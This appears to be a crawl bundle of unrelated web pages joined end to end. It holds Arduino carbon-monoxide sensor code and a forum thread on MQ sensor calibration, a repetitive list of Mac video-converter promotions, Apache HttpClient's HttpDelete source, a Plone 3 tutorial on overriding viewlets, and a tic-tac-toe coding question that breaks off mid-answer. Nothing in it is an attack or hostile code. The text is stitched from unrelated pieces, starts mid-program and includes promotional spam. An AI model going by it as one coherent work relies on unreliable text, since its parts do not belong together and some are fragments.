          { //the brighter it is, the lower concentration is
            br_red = 0; //turn off red
            br_green = (red_threshold - last_CO_ppm_measurement) * 100.0 / red_threshold; //the more negative is concentration, the higher is value
            if (br_green < 1) br_green = 1; //don't turn off completely
          }
          else //if we are above threshold, turn on red one
          {
            br_green = 0; //keep green off
            br_red = (last_CO_ppm_measurement - red_threshold) * 100.0 / red_threshold; //the higher is concentration, the higher is this value
            if (br_red < 1) br_red = 1; //don't turn off completely
          }
          if (last_CO_ppm_measurement > alarm_ppm_threshold) //if at 50 seconds of measurement cycle we are above threshold
            buzz_beep();
          else
            buzz_off();
          setLEDs(br_green, br_red); //set LEDs brightness
        }
      }
      if (phase == 1 && sec10 - high_on > 600) //60 seconds of heating ended?
        startMeasurementPhase();
      if (phase == 0 && sec10 - low_on > 900) //90 seconds of measurement ended?
      {
        last_CO_ppm_measurement = raw_value_to_CO_ppm(sens_val);
        startHeatingPhase();
      }
      float v = analogRead(A0); //reading value
      sens_val *= 0.999;        //applying exponential averaging using formula
      sens_val += 0.001 * v;    // average = old_average*a + (1-a)*new_reading
      if (sec10 - last_print > 9) //print measurement result into serial 2 times per second
      {
        last_print = sec10;
        Serial.print(sens_val);
        Serial.print(" ");
        Serial.print(0.1 + phase * 1000);
        Serial.print(" ");
        Serial.println(last_CO_ppm_measurement);
      }
    }

from this guide. I was wondering if it could be used on a MySensors node even with all those timers modifications.

- borneo1910:
Does anyone know if any of these sensors can be used to detect vaporized white mineral oil?

Vaporized oil is very messy, I don't think they would be any good as it is not volatile.

- borneo1910:
Does it change things if it's actually atomized and not vaporized? What I'm saying is that it is not a gas that dissolves in air, it is more particulate matter suspended in the air.

So an optical sensor is probably better, given that the sensor could last, as oil tends to stick to stuff.

- user2684 Contest Winner:
I spent the last few days trying to get a sense out of the black magic behind the calculations used for this sensor. I got the math now, but I still feel there is something not completely accurate with the current implementation. First of all, the resulting ppm seems like a sort of normalized value; since I know e.g. CO2 ppm in clean air is around 400, the code seems not to take this into consideration. Also, configuring it with a different MQ sensor doesn't seem an easy task. For these reasons I've tried starting from scratch, inspired by. Starting point is the power function y = a*x^b.
The way to make the code more generic is to let the user provide the coordinates of two points (like @APL2017 was suggesting a while ago), which is an easy task, and let the code solve the two equations and derive the values of a and b. Then, since ppm = a(rs/ro)^b, with a known value of ppm (e.g. the concentration of the gas in clean air, which for CO2 is 411), the equation can be solved for Ro by measuring Rs from the adc. Once a, b and Ro are known, the ppm comes naturally by solving again ppm = a(rs/ro)^b. I'm not sure this is better than the other methods, but at least I get the same results as the blog above, both in terms of values of a, b and Ro as well as a real value of CO2 ppm measured with an MQ135. The downside of this, of course, is the difficulty of providing a known ppm value for the calibration of other gases like e.g. CH4, but if I claim I'm showing a ppm value, I want to be sure this is a real ppm. The code is here, within the dev branch of NodeManager, any feedback would be appreciated!
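To make the math above concrete, here is a small Python sketch of the same approach: fit ppm = a*(Rs/Ro)^b from two chart points, solve for Ro at a known concentration, then read ppm back. The numeric points below are made-up placeholders, not datasheet values:

```python
import math

def resistance_kohm(adc_raw, ref_kohm=10.0):
    """Rs from a 10-bit ADC reading (0..1023) of a voltage divider
    built with a reference resistor, as in the sketches above."""
    return ref_kohm * 1023.0 / adc_raw - ref_kohm

def power_fit(p1, p2):
    """Solve ppm = a * ratio**b from two (ratio, ppm) chart points."""
    (r1, ppm1), (r2, ppm2) = p1, p2
    b = math.log(ppm2 / ppm1) / math.log(r2 / r1)
    a = ppm1 / r1 ** b
    return a, b

def calibrate_ro(rs, known_ppm, a, b):
    """Given Rs measured at a known concentration, solve ppm = a*(rs/ro)**b for Ro."""
    return rs / (known_ppm / a) ** (1.0 / b)

def to_ppm(rs, ro, a, b):
    return a * (rs / ro) ** b

# made-up example points (Rs/Ro ratio, ppm) read off a sensitivity chart
a, b = power_fit((2.6, 10.0), (0.75, 200.0))
rs = resistance_kohm(512)               # one raw ADC sample
ro = calibrate_ro(rs, 411.0, a, b)      # calibrate at 411 ppm (outdoor CO2)
print(round(to_ppm(rs, ro, a, b)))      # 411, by construction
```

The fit is exact through both chart points, so the quality of the result depends entirely on how accurately the two points are read off the datasheet curve.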
https://forum.mysensors.org/topic/4813/gas-sensor/
How to convert JVC MOD to AVI on Mac with Mac MOD to AVI Converter
MOD to AVI Converter for Mac is the best conversion software for you to convert MOD to AVI, MP4, WMV, MPEG, iPod, iPhone, etc. on Mac OS, and you will never complain about how to play your MOD files on Mac.

TS to MOV on Mac - How to use Mac TS to MOV Converter to convert TS to MOV on Mac?
Mac TS to MOV Converter is a multifunction device, it will help you transform TS format to FLV, MKV, MOV, WMV, ASF, MPEG1, MPEG2, MP4, 3GP, 3G2, AVI, TOD, MP3, etc.

Mac VRO to FCE Converter - How to import VRO files to Final Cut Express on Mac
Mac VRO to Final Cut Express Converter enables you to convert VRO to an FCE supported format, and after conversion you can import VRO to FCE on Mac.

Mac VRO to iMovie Converter - How to import VRO to iMovie for editing on Mac?
Mac VRO to iMovie Converter can help you convert VRO to iMovie and import .vro files into iMovie on Mac.

How to convert MOV files to MPEG/MPG on Mac
You can easily convert MOV to MPEG or convert MOV to MPG on Mac with Mac MOV to MPEG/MPG Converter and enjoy the videos on Mac.

How to convert QuickTime MOV files to FLV on Mac OS X
Mac MOV to FLV Converter is an ideal software that enables you to convert MOV to FLV on Mac so that you can enjoy the videos.

Mac MOV to WMV Converter - How to convert QuickTime MOV to WMV on Mac OS X
This MOV to WMV Converter can help you convert MOV to WMV on Mac so that you can enjoy the videos.

Mac MOV to AVI Converter - How to convert MOV to AVI on Mac with MOV to AVI Converter for Mac
Mac MOV to AVI Converter allows you to convert MOV to AVI on Mac so that you can share MOV videos with friends.

Mac MOV to MP4 - How to convert MOV to MP4 on Mac (Snow Leopard)
Free guide for you to convert MOV files to MP4 format on Mac, then you can play MOV files on your digital players like iPod, PSP.
MOV format converter, how to play and convert MOV files on Mac
This teaches you how to play MOV files and convert MOV files by using Mac MOV Video Converter.
http://www.jumptags.com/appletv1985/
DELETE method

    /**
     * <p>
     * The HTTP DELETE method is defined in section 9.7 of
     * <a href="">RFC2616</a>:
     * <blockquote>
     * The DELETE method requests that the origin server delete the resource
     * identified by the Request-URI. [...] The client cannot
     * be guaranteed that the operation has been carried out, even if the
     * status code returned from the origin server indicates that the action
     * has been completed successfully.
     * </blockquote>
     *
     * @since 4.0
     */
    @NotThreadSafe // HttpRequestBase is @NotThreadSafe
    public class HttpDelete extends HttpRequestBase {

        public final static String METHOD_NAME = "DELETE";

        public HttpDelete() {
            super();
        }

        public HttpDelete(final URI uri) {
            super();
            setURI(uri);
        }

        /**
         * @throws IllegalArgumentException if the uri is invalid.
         */
        public HttpDelete(final String uri) {
            super();
            setURI(URI.create(uri));
        }

        @Override
        public String getMethod() {
            return METHOD_NAME;
        }

    }
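The DELETE semantics described in the javadoc above can be exercised end-to-end with nothing but the Python standard library (shown here as a language-neutral illustration, not Apache HttpClient; the URL path and the 204 reply are arbitrary choices for the demo):

```python
import http.server
import threading
import urllib.request

class Handler(http.server.BaseHTTPRequestHandler):
    def do_DELETE(self):
        # pretend the resource identified by the Request-URI was deleted
        self.send_response(204)  # No Content
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass

server = http.server.HTTPServer(("127.0.0.1", 0), Handler)
threading.Thread(target=server.serve_forever, daemon=True).start()

url = f"http://127.0.0.1:{server.server_port}/items/1"
request = urllib.request.Request(url, method="DELETE")
with urllib.request.urlopen(request) as response:
    status = response.status

print(status)  # 204
server.shutdown()
```

Note that, exactly as the RFC quote warns, a success status code is only the origin server's claim that the action completed; the client gets no hard guarantee.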
http://hc.apache.org/httpcomponents-client-4.3.x/httpclient/xref/org/apache/http/client/methods/HttpDelete.html
Plone 3 has switched to use Zope 3 viewlet components instead of the old macro include approach. This tutorial intends to teach you what viewlets and viewlet managers are, and how you can play with them in the context of adding a new theme to a Plone 3.0 site. Even if it is or will be possible to go through all the steps that will be demonstrated in this tutorial from a Through The Web interface, the purpose here is to show how it is possible to achieve the given goals programmatically, from a Python product that lives on the filesystem. So let's dig right into the code and have a look at the main_template template of Plone, which is the template that aggregates the page regions that are rendered around the content region of a Plone page (i.e. the header, the footer, and the two side columns): In main_template.pt, which resides in $INSTANCE_HOME/Products/CMFPlone/skins/plone_templates/, we can see that the content of the <div /> region with id portal-top contains three lines of code. In versions of Plone previous to 3.0, it used to contain a whole list of macro calls for rendering the site wide actions, the quick search box, the logo, the global sections, the personal bar and breadcrumbs, etc.. For the example that I want to show, the old portion of the main_template.pt file used to look like this (in CMFPlone prior to 3.0): <div id="portal-top" i18n: <div id="portal-header"> <p class="hiddenStructure"> <a accesskey="2" tal:Skip to content.</a> | <a accesskey="6" tal:Skip to navigation</a> </p> <div metal: Site-wide actions (Contact, Sitemap, Help, Style Switcher etc) </div> <div metal: The quicksearch box, normally placed at the top right </div> <a metal: The portal logo, linked to the portal root </a> <div metal: The skin switcher tabs. Based on which role you have, you get a selection of skins that you can switch between. </div> <div metal: The global sections tabs. (Welcome, News etc) </div> </div> <div metal: The personal bar. (log in, logout etc...) 
</div> <div metal: The breadcrumb navigation ("you are here") </div> </div>

Where it now looks like this:

<div id="portal-top" i18n:
  <div tal:
  </div>
</div>

The provider TAL expression is a Zope 3 expression which looks up a content provider from a page template. In the Zope 3 world (since Zope 3.2), a content provider is a component that generates a portion of an HTML page. Like Zope 3 views, content providers are multi adapters that adapt the context and the request. Content providers additionally adapt the view they are looked up from.

Viewlets are content providers: they are small components of a page that render a small piece of HTML code. In Plone templates, viewlets are not looked up directly though. In order to be able to organize viewlets with a maximum of flexibility, they are aggregated in viewlet managers. A viewlet manager is also a Zope 3 content provider, which renders a set of viewlets that are registered for it.

In the further chapters of this tutorial, I will do my best to teach you more about what viewlets and viewlet managers are, what you can do with them and what the advantages of this approach are. If you still feel that you need more input on the subject, you should read the dedicated section of Philipp's book (Web Component Development with Zope 3 - 2nd edition, chapter 10.4). I also found this very good blog entry, where Jeff Shell gives a more extensive description of content providers and viewlets in the context of developing a pure Zope 3 application.

Reordering and Hiding viewlets

How to simply change the viewlets behavior from a Generic Setup Profile.

We saw in the previous paragraph that viewlets ordering is stored in a utility. That utility is set up from the viewlets.xml file of a Generic Setup profile.
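Stripped of all the Zope component machinery, the idea — a manager renders the viewlets registered for it, in a stored, adjustable order, skipping hidden ones — can be sketched in plain Python (an illustration only; this is not the zope.viewlet API, and the viewlet names are just examples):

```python
class Viewlet:
    """A tiny component that renders a small piece of HTML."""
    def __init__(self, name, html):
        self.name = name
        self.html = html
    def render(self):
        return self.html

class ViewletManager:
    """Aggregates viewlets and renders them in a configurable order,
    much like the ordering stored by the viewlets.xml utility."""
    def __init__(self):
        self.viewlets = {}
        self.order = []
        self.hidden = set()

    def register(self, viewlet):
        self.viewlets[viewlet.name] = viewlet
        self.order.append(viewlet.name)

    def move_before(self, name, other):
        self.order.remove(name)
        self.order.insert(self.order.index(other), name)

    def render(self):
        return "\n".join(self.viewlets[n].render()
                         for n in self.order if n not in self.hidden)

manager = ViewletManager()
manager.register(Viewlet("plone.logo", "<div>logo</div>"))
manager.register(Viewlet("plone.searchbox", "<div>search</div>"))
manager.move_before("plone.searchbox", "plone.logo")   # reorder
manager.hidden.add("plone.logo")                       # hide
print(manager.render())  # <div>search</div>
```

The <order /> and <hidden /> declarations in viewlets.xml play the role of the move_before call and the hidden set here, with the real implementation storing that state per skin in a utility.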
Ordering If all you need is to reorder the viewlets in the Plone Default skin, you can simply copy the original viewlets.xml from CMFPlone/profiles/default/ into MyTheme/profiles/default/, and edit the copied file to make it reflect your needs. But you may want to order viewlets with more flexibility. Be happy: there are handy parameters for each node in viewlets.xml. Let's see how would look a viewlets.xml file for a 3rd party theme product: <?xml version="1.0"?> <object> <order manager="plone.portalheader" skinname="My Theme" based- <viewlet name="plone.logo" insert- </order> <order manager="plone.portaltop" skinname="*"> <viewlet name="plone.app.i18n.locales.languageselector" insert- </order> </object> The above code contains two <order /> declarations: The first one creates a new skin named My Theme which is based on the Plone Default one. This means that the new skin inherits from the viewlets ordering of the skin it is based on. In our example, the plone.logo is moved at the first position in the plone.portalheader viewlet manager. The second declaration moves plone.app.i18n.locales.languageselector right after plone.path_bar in the plone.portaltop viewlet manager for all skins (notice the skinname="*" statement). - Note Both DIYPloneStyle and ZopeSkel add a viewlets.xml file when generating a blank theme product (use --add-viewlet-example with the DIYPloneStyle generator script). For your convenience, you can find inline documentation about the parameters that can be used in the generated file (It is an option with ZopeSkel, answer 'True' when it asks for it). Hiding Hiding a viewlet is also done from the viewlets.xml with the <hidden /> node which is at same level as <order />, and is done per skin selection. 
For instance, if you need to remove the global sections for your skin, you'd have to add some declaration like the following one to viewlets.xml: <hidden manager="plone.portalheader" skinname="My Theme"> <viewlet name="plone.global_sections" /> </hidden> Unhiding If, for any reason, you need to unhide one or more viewlets for a given viewlet manager, you can make use of the purge and remove node parameters in your <hidden /> declaration in viewlets.xml. To unhide all hidden viewlets for a given viewlet manager: <?xml version="1.0"?> <object> <hidden manager="plone.portalheader" skinname="Plone Default" purge="True" /> </object> To unhide specific viewlet(s): <?xml version="1.0"?> <object> <hidden manager="plone.portalheader" skinname="Plone Default"> <viewlet name="plone.global_sections" remove="True" /> </hidden> </object> - Note - The purge and remove node parameters are also supported inside the <order /> declaration. Nothing that difficult here ;-) Adding a viewlet How to add a viewlet and still have several skins living in peace. Hiding and reordering viewlets within a viewlet manager is something we can do, we now have to cover how to add a new one. Example First, lets have a look at one of the examples that are shipped with DIYPloneStyle (version 3.0 is out, still beta but useable) in order to have a better understanding of the machinery: The credits_viewlet product that is located in DIYPloneStyle/example/ adds a new viewlet to the portal footer region. In the credits_viewlet code, in its browser/ folder, we have a set of files: - browser/ - __init__.py - configure.zcml - interfaces.py - logo.pt - viewlets.py - __init__.py - This is an empty file, that is here simply to make browser a python package. - configure.zcml - The file where all Zope 3 configuration is defined for browser. - interfaces.py - We'll need this file a bit later, I leave it where it is for now. - logo.pt - The template that will replace the original HTML code in the main template. 
- viewlets.py - The file that stores viewlet Python classes.

In the same DIYPloneStyle/example/credits_viewlet subfolder, we find the profiles/ repository that stores the Generic Setup configuration files: skins.xml and viewlets.xml.

Practice

Let's get back to our own MyTheme product and reproduce the example we just looked at.

Viewlet registration

In order to create our new viewlet, we'll have to write a viewlet class in MyTheme/browser/viewlets.py (that renders the MyTheme/browser/credits.pt template), and register it for the viewlet manager we want it to show in (from MyTheme/browser/configure.zcml). Then we'll have to order it at the place we want it to show within the viewlet manager (in MyTheme/profiles/default/viewlets.xml).

- Note
- If you generate your theme product with DIYPloneStyle, you have to use the --add-viewlet-example option while calling the generator script in order to have the viewlet base code included in your project. The plone3_theme template from ZopeSkel includes viewlet base code by default.

We have to edit the following files…

MyTheme/browser/__init__.py: This is an empty but needed file that makes browser/ a python package.

In MyTheme/browser/viewlets.py:

from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
from plone.app.layout.viewlets.common import ViewletBase

DESIGNER = 'John Doe'

class CreditsViewlet(ViewletBase):
    render = ViewPageTemplateFile('credits.pt')

    def update(self):
        # set here the values that you need to grab from the template.
        # stupid example:
        self.designer = DESIGNER

In MyTheme/browser/credits.pt:

<div id="design-credits" i18n:domain="mytheme">
  <span i18n:translate="">Design by:
    <span tal:content="view/designer">Terry Gilliam</span>.
  </span>
</div>

In MyTheme/browser/configure.zcml:

<configure
    xmlns="http://namespaces.zope.org/zope"
    xmlns:browser="http://namespaces.zope.org/browser">

  <browser:viewlet
      name="example.credits"
      manager="plone.app.layout.viewlets.interfaces.IPortalFooter"
      class=".viewlets.CreditsViewlet"
      permission="zope2.View"
      />

</configure>

Don't forget to include the browser package in MyTheme/configure.zcml:

<configure
    xmlns="http://namespaces.zope.org/zope"
    xmlns:five="http://namespaces.zope.org/five">

  <include file="profiles.zcml" />
  <include package=".browser" />

</configure>

In MyTheme/profiles/default/viewlets.xml:

<?xml version="1.0"?>
<object>
  <order manager="plone.portalfooter" skinname="Credits Viewlet Theme" based-on="Plone Default">
    <viewlet name="example.credits" insert-after="*" />
  </order>
</object>

We can register our new skin from MyTheme/profiles/default/skins.xml:

<?xml version="1.0"?>
<object name="portal_skins">
  <skin-path name="Credits Viewlet Theme" based-on="Plone Default" />
</object>

Now we can restart Zope and install our product in Plone. No problem so far: after restarting Zope, installing our product in Plone, and refreshing the portal home page, we see that the footer region has been modified and now displays, in addition to its default content, a message telling who owns credits for the site design.

Skin layer

Now let's go, as portal manager, to Site Setup > Themes in the Plone interface, and select Plone Default as the default theme. After refreshing the portal home page, we see that the credits viewlet is still rendered at the bottom of the page, which is not what we want. We must find a way to make the credits viewlet render only for the skin it was designed for.

We could hide it for all other themes from the viewlets.xml Generic Setup file with the <hidden /> node, but that won't work if you want to design a distributable product: you never know what other theme(s) could be installed on any portal that will have yours installed on it.

We can register a viewlet for only one theme (one skin selection) thanks to the plone.theme package. Thanks to plone.theme, we can set a Zope 3 skin layer that corresponds to a skin selection in portal_skins (a theme).
In order to set that skin layer up, add or edit the following files in the browser/ folder of our MyTheme product:

MyTheme/browser/interfaces.py:

from plone.theme.interfaces import IDefaultPloneLayer

class IThemeSpecific(IDefaultPloneLayer):
    """Marker interface that defines a Zope 3 skin layer bound to a
    Skin Selection in portal_skins.
    """

You don't need to rename that interface class, even if you have more than one theme product: there will be no clash with other products holding the same interface in their own browser/ directories.

MyTheme/browser/configure.zcml:

<configure
    xmlns="http://namespaces.zope.org/zope"
    xmlns:browser="http://namespaces.zope.org/browser">

  <interface
      interface=".interfaces.IThemeSpecific"
      type="zope.publisher.interfaces.browser.IBrowserSkinType"
      name="My Theme"
      />

  <browser:viewlet
      name="example.credits"
      manager="plone.app.layout.viewlets.interfaces.IPortalFooter"
      class=".viewlets.CreditsViewlet"
      layer=".interfaces.IThemeSpecific"
      permission="zope2.View"
      />

</configure>

Note the interface declaration for the Zope 3 skin layer, and the layer parameter for the viewlet itself. The value of the name parameter in the interface declaration must be the name of the theme added by MyTheme (also known as the skin name), as seen in the Site Setup > Themes Plone control panel. The value of the layer attribute in the viewlet declaration must be the interface that is used to define the skin layer.

After restarting Zope (or refreshing our product) and reloading the portal home page, we can see that the Plone Default theme no longer shows our viewlet. Cool :-)

Overriding a template viewlet

How to use Zope 3 technology to override a viewlet with a template definition.

In the previous chapters of this tutorial we learned how to add a viewlet to a viewlet manager for a specific theme, and how to hide a viewlet from a viewlet manager in a specific theme. By combining these two techniques we should be able to override a default Plone viewlet with a custom one for a specific theme. It shouldn't be that different from hiding the targeted Plone viewlet and adding/positioning a custom one. Actually, it is different, and simpler.

Theory

The key concept here is the use of a Zope 3 skin layer.
We saw in the previous chapter how to make use of a Zope 3 skin layer to make sure that the viewlet we added to our theme would not render in any other one. In this chapter we will make use of the same skin layer to override a default Plone viewlet with a custom one.

The principle is this: in our product (or package), we declare in configure.zcml a viewlet that has the same name as one of the Plone default viewlets, but with a different constructor class or template than the original one (we can use a template even if the original declares a class, and vice versa). By using the layer attribute in the custom viewlet's ZCML declaration, we register the viewlet for a Zope 3 skin layer. That skin layer has the same name as the theme that is added to the portal_skins tool. Zope 3 skin layers are bound to skin selections in portal_skins (themes) thanks to the plone.theme package, which means that a skin layer is applied if its name matches the name of the selected skin in portal_skins. A viewlet that is registered for a skin layer is rendered when that layer is applied, and overrides any other viewlet that has the same name but is not registered for that layer.

Practice

Let's see how we can apply this viewlet overriding within MyTheme, the product that we started to develop in the previous chapters. Our goal here is to have the footer render a different text in our theme than the default Plone one.

1. Creating/Registering the Zope 3 skin layer

Both ZopeSkel and DIYPloneStyle generate code that defines the skin layer interface in MyTheme/browser/interfaces.py. The interface class is named IThemeSpecific and inherits from plone.theme.interfaces.IDefaultPloneLayer.

The plone3_theme template of ZopeSkel generates a package which includes a browser/ directory and a Zope 3 skin layer by default. That is not the case with the generator script of DIYPloneStyle.
In order to have a Zope 3 skin layer added to a product generated with DIYPloneStyle, you have to run the script with the option --add-viewlet-example. If you already generated your product with DIYPloneStyle without the --add-viewlet-example option, see the previous chapter for how to add the skin layer manually.

2. Identifying which viewlet to override

We have to identify which viewlet we want to override, and for which viewlet manager it is registered. Plone ships with a basic user interface for reordering and hiding/showing viewlets inside their viewlet managers. To access that configuration page, point your browser to the @@manage-viewlets view of your site (or equivalent based on your Zope/Plone installation). The viewlets management page should look like this one (rendered with the Plone Default theme):

At the end of that page, we can identify the footer region, and note that it is rendered by a viewlet manager called plone.portalfooter. We can also see that two viewlets are registered with plone.portalfooter: plone.footer and plone.colophon. plone.footer is our target: it is the one that we want to see rendered differently in our theme.

3. Write the code that renders the viewlet

Now that we know which viewlet we want to override, let's have a look at its code in our Plone installation on the file system. Plone default viewlets are declared in the plone.app.layout.viewlets package. Most of the time, that package can be found in $INSTANCE_HOME/lib/python/plone/app/layout/viewlets.

Inside the plone.app.layout.viewlets package, configure.zcml tells us where the code that renders the default plone.footer viewlet in the Plone Default theme lives. We find the default footer viewlet declaration near the end of the file:

<!-- Footer -->
<browser:viewlet
    name="plone.footer"
    manager=".interfaces.IPortalFooter"
    template="footer.pt"
    permission="zope2.View"
    />

We note that this viewlet isn't rendered by a Zope 3 view but directly from a template, whose name is footer.pt. We can make a copy of that template in the browser/ directory of MyTheme. No need to give it a different name.
Edit the template to make it render a different text than the one in the Plone Default theme, for instance:

<div id="portal-footer" i18n:domain="mytheme">
  <p>
    <span i18n:translate="">Design by
      <span>
        <a href="">John Doe</a>
      </span>.
    </span>
  </p>
</div>

4. Register the custom viewlet in configure.zcml

In order to register the template with the portal footer viewlet manager, we simply copy the portion of ZCML code that we found in lib/python/plone/app/layout/viewlets/configure.zcml (shown earlier on this page) into MyTheme/browser/configure.zcml, and we edit it to make sure it uses the right interfaces for the manager and the Zope 3 skin layer:

<!-- The customized footer -->
<browser:viewlet
    name="plone.footer"
    manager="plone.app.layout.viewlets.interfaces.IPortalFooter"
    template="footer.pt"
    layer=".interfaces.IThemeSpecific"
    permission="zope2.View"
    />

5. Done

That's all. We can now restart Zope, install the new theme from Site Setup > Add-on Products in the Plone interface, and reload the portal front page (or any other page) to see the result in the footer region.

Other example

Another example of viewlet overriding can be found in DIYPloneStyle/example/custom_footer/. It is quite easy to understand and should be self-explanatory now that you have read most of this chapter.

This example is slightly different from the one we just covered, though: the new viewlet uses a Zope 3 browser view for its rendering. The principles are the same anyway. The product layout on the file system is also a bit different from the one typically found in a product generated by DIYPloneStyle or ZopeSkel. All viewlet code is kept at the first level of the package, in a browser.py module; there is no browser sub-package (folder). This shows that there is more than one possible layout for organizing a Plone theme package/product.

- In browser.py, we find IThemeSpecific, the interface of the Zope 3 skin layer, and FooterViewlet, the viewlet class that overrides the default Plone one.
- footer.pt is the template rendered by FooterViewlet.
- profiles/default/ is the usual Generic Setup profile for the product.
- The interface, the viewlet, and the product Generic Setup profile are all declared in a single configure.zcml.

And now… happy customizing!

Overriding a class viewlet

How to use Zope 3 technology to override a viewlet with a class definition.

In the previous chapter we learned how to override a viewlet that has a template in its definition. But there are a lot of viewlets in Plone that have a Python class in their definitions instead of a simple template. So, let's have a look at how to customize such a viewlet. The steps for overriding a class viewlet do not differ much from what you learned in the previous chapter, so let's just cover the practical points of our use case.

Introduction

We suppose you are already familiar with how to find the viewlet you want to override, using the @@manage-viewlets view from the previous chapter. For this particular example, let's override the plone.path_bar viewlet that is managed by the plone.portaltop viewlet manager. It's the viewlet that renders a path bar (better known as the breadcrumbs) below the global navigation. In this example we will get rid of the "You are here:" text in the plone.path_bar viewlet.

1. Code that renders the viewlet

Let's have a look at how this viewlet is declared in configure.zcml inside the plone.app.layout.viewlets package:

<!-- The breadcrumbs -->
<browser:viewlet
    name="plone.path_bar"
    manager=".interfaces.IPortalTop"
    class=".common.PathBarViewlet"
    permission="zope2.View"
    />

As you can see, this viewlet is rendered by a Zope 3 view, defined in the common.PathBarViewlet class inside the plone.app.layout.viewlets package.
Here is what this class looks like:

class PathBarViewlet(ViewletBase):
    render = ViewPageTemplateFile('path_bar.pt')

    def update(self):
        portal_state = getMultiAdapter((self.context, self.request),
                                       name=u'plone_portal_state')
        self.navigation_root_url = portal_state.navigation_root_url()
        self.is_rtl = portal_state.is_rtl()

        breadcrumbs_view = getMultiAdapter((self.context, self.request),
                                           name='breadcrumbs_view')
        self.breadcrumbs = breadcrumbs_view.breadcrumbs()

We are not going to change the standard behavior of the viewlet in this example. The only thing we want is to get rid of the "You are here:" text. Thus render = ViewPageTemplateFile('path_bar.pt') is exactly what we are interested in.

2. Customize the viewlet's template

The render = ViewPageTemplateFile('path_bar.pt') line defines the page template for the plone.path_bar viewlet. You can find the path_bar.pt template inside the plone.app.layout.viewlets package. Let's make a copy of this template in the browser/ directory of MyTheme. No need to give it a different name. Edit the template to remove the text we do not need:

<div id="portal-breadcrumbs" i18n:domain="plone">
  <!-- We use a comment to show what part we remove
  <span id="breadcrumbs-you-are-here" i18n:translate="you_are_here">
    You are here:
  </span>
  -->
  <a href="" tal:attributes="href view/navigation_root_url"
     i18n:translate="tabs_home">Home</a>
  <span tal:condition="view/breadcrumbs">
    <tal:ltr condition="not:view/is_rtl">→</tal:ltr>
    <tal:rtl condition="view/is_rtl">»</tal:rtl>
  </span>
  <span tal:repeat="crumb view/breadcrumbs">
    ...
  </span>
</div>

Now we need to make the plone.path_bar viewlet use this template for rendering.

3. Overriding the class that renders the template

Since the ZCML declaration for plone.path_bar in lib/python/plone/app/layout/viewlets/configure.zcml uses a class instead of a simple template, the core of the customization is overriding that class as well. To do this we will simply subclass the default viewlet's class and apply our changes, so that they override the default ones. You have seen the default class used for this viewlet in point 1 above. So, to subclass the PathBarViewlet class, we should add a new viewlets.py into MyTheme/browser/.
This will be the place where you override classes used for viewlets. Add the following to your viewlets.py:

from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
from plone.app.layout.viewlets import common

class PathBarViewlet(common.PathBarViewlet):
    """A custom version of the path bar class
    """
    render = ViewPageTemplateFile('path_bar.pt')

As you can see, we create a new class, PathBarViewlet, that is a subclass of common.PathBarViewlet, the default class for the plone.path_bar viewlet. The only thing we need to override is the template used for rendering the viewlet. We already have a customized path_bar.pt inside MyTheme/browser/, so our new class refers to our customized template.

3.1 Theme Compatibility Between Different 3.x Versions of Plone

Version 1.1.3 of the plone.app.layout egg was released in July of 2008. As of this version, the viewlet template is controlled via the 'index' attribute rather than 'render', because 'index' can be overridden by using the ZCML template attribute, removing the need for a special viewlet subclass. If you need to make a subclass anyway, you can continue to use the render attribute as mentioned above if you want to, or you can use 'index' instead, like this:

from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
from plone.app.layout.viewlets import common

class PathBarViewlet(common.PathBarViewlet):
    """A custom version of the path bar class
    """
    index = ViewPageTemplateFile('path_bar.pt')

If you're going to distribute your theme and need to maintain backwards compatibility with the Plone 3.0.x series, additional code needs to be included. You should add the following lines that make the render method defer to the 'index' attribute.
(This is done in ViewletBase in Plone 3.1.x, but not in Plone 3.0.x.):

from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
from plone.app.layout.viewlets import common

class PathBarViewlet(common.PathBarViewlet):
    """A custom version of the path bar class
    """
    def render(self):
        # defer to the index method, because that's what gets overridden
        # by the template ZCML attribute
        return self.index()

    index = ViewPageTemplateFile('path_bar.pt')

Otherwise, themes created with newer versions of plone.app.layout will not be compatible with older versions of Plone.

That's it for the class. In case you need to customize not only the template but also the viewlet's behavior, this is the right place to do so. So far so good: we have the customized class that uses the customized template. Now we need to register these customizations in MyTheme/browser/configure.zcml.

4. Register the custom viewlet in configure.zcml

In order to register the customized class with the plone.path_bar viewlet, we simply copy the portion of ZCML code that we found in lib/python/plone/app/layout/viewlets/configure.zcml (see point 1 above) into MyTheme/browser/configure.zcml, and edit it to make sure it uses the right class and the right interfaces for the manager and the Zope 3 skin layer:

<!-- The customized breadcrumbs -->
<browser:viewlet
    name="plone.path_bar"
    manager="plone.app.layout.viewlets.interfaces.IPortalTop"
    class=".viewlets.PathBarViewlet"
    layer=".interfaces.IThemeSpecific"
    permission="zope2.View"
    />

The use of layer=".interfaces.IThemeSpecific" was explained in the previous chapter. name and permission remain the same as in the default viewlet declaration, although you could change name to make it clear that this is not a standard viewlet; you could use something like "MyTheme.path_bar" as the name here. For manager we use the full dotted path to the IPortalTop interface, implemented by the plone.portaltop viewlet manager. And the core part of our customization: we switch class to our customized class from MyTheme/browser/viewlets.py.

5.
Additional step (only if you have changed the viewlet name in ZCML)

If you have renamed your custom viewlet to "MyTheme.path_bar", you have created a new viewlet that has to be registered in your Generic Setup profile. To avoid having two path bars in your site, you should also hide the default plone.path_bar viewlet. To review how to hide an existing viewlet and register a new one, please refer to page 3 of this tutorial.

6. Done

Now you can restart your Zope. If you have your theme installed already, you need to reinstall it from Site Setup > Add-on Products. After all these steps you should no longer see the "You are here:" text in your breadcrumbs.
I have the following code and feel it could be more efficient. Meaning, this is a 3x3 board and could be done manually, but what if it were a 30x30 board or bigger?

x = [[1, 2, 0], [2, 1, 0], [2, 1, 0]]

for y in range(3):
    if ((x[0][0] == x[1][0] == x[2][0] == y) or
        (x[0][1] == x[1][1] == x[2][1] == y) or
        (x[0][2] == x[1][2] == x[2][2] == y) or
        (x[0][0] == x[0][1] == x[0][2] == y) or
        (x[1][0] == x[1][1] == x[1][2] == y) or
        (x[2][0] == x[2][1] == x[2][2] == y) or
        (x[0][0] == x[1][1] == x[2][2] == y) or
        (x[0][2] == x[1][1] == x[2][0] == y)):
        if y == 1:
            print('Player 1 won!!!')
        if y == 2:
            print('Player 2 won!!!')
        if y == 0:
            print('Nobody won')

You could use a function factory (a function that returns a function) like this:

def cell_owner(player):
    """returns a function which can check if a cell belongs to provided player"""
    def wrapped(cell):
        return player == cell
    return wrapped

